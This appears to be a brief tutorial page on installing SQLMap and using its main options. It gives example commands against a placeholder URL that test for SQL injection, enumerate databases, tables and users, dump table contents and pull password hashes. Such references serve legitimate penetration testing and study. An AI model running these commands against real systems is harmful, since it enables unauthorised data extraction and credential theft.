How to Install SQLMap

SQLMap installation:

Installation

username@machine_name:~$ sudo apt install sqlmap

Useful Commands for SQLMap

-u [URL]: Specify the target URL
--data [data]: Data string to be sent through POST
-p [parameter]: Specify the parameter to test for SQL injection
--dbs: Enumerate databases
--tables: Enumerate tables in a database
--columns: Enumerate columns in a table
--dump: Dump database table entries
--users: Enumerate database users
--passwords: Enumerate database users password hashes
--level [level]: Set the level of tests to perform (1-5)
--risk [risk]: Set the risk of tests to perform (1-3)

Examples of SQLMap Commands

Basic SQL injection test on a URL:

Basic Test

username@machine_name:~$ sqlmap -u "http://example.com/index.php?id=1"

SQL injection test with POST data:

POST Data Test

username@machine_name:~$ sqlmap -u "http://example.com/index.php" --data="id=1&name=test"

Enumerate databases:

Enumerate Databases

username@machine_name:~$ sqlmap -u "http://example.com/index.php?id=1" --dbs

Enumerate tables in a specific database:

Enumerate Tables

username@machine_name:~$ sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

Enumerate columns in a specific table:

Enumerate Columns

username@machine_name:~$ sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns

Dump entries of a specific table:

Dump Table

username@machine_name:~$ sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

Enumerate database users:

Enumerate Users

username@machine_name:~$ sqlmap -u "http://example.com/index.php?id=1" --users

Enumerate database users password hashes:

Enumerate Passwords

username@machine_name:~$ sqlmap -u "http://example.com/index.php?id=1" --passwords

<